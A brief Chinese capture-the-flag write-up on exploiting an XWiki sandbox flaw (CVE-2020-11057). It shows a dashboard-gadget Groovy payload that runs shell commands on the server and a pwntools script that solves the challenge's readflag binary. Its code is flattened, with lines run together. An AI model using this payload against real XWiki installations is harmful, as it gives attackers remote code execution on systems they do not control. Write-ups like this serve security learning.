GACTF之XWiki
文章来源:EDI安全
01
地址
https://jira.xwiki.org/browse/XWIKI-16960https://nvd.nist.gov/vuln/detail/CVE-2020-11057
02
审计
注册一个用户登录在后台dashboard添加gadget
r = Runtime.getRuntime()proc = r.exec('dir /');BufferedReader stdInput1 = new BufferedReader(new InputStreamReader(proc.getInputStream()));String s1 = null;while ((s1 = stdInput1.readLine()) != null) { print s1; }
03
获取根目录文件
04
解码
发现readflag使用base64编码拿出文件
05
结果
活脱脱一个小游戏 懒得看算法了
from pwn import *import recontext.log_level = 'DEBUG'io = process("./readflag")flag = ""for i in range(464): io.recvuntil("bigger?") s = io.recvuntil("n") t = re.findall("(d.*) : (d.*)",s)[0] print(t) if int(t[0])>int(t[1]): io.sendline("0") flag += "0" else: io.sendline("1") flag += "1"io.close()# io.interactive()print(flag)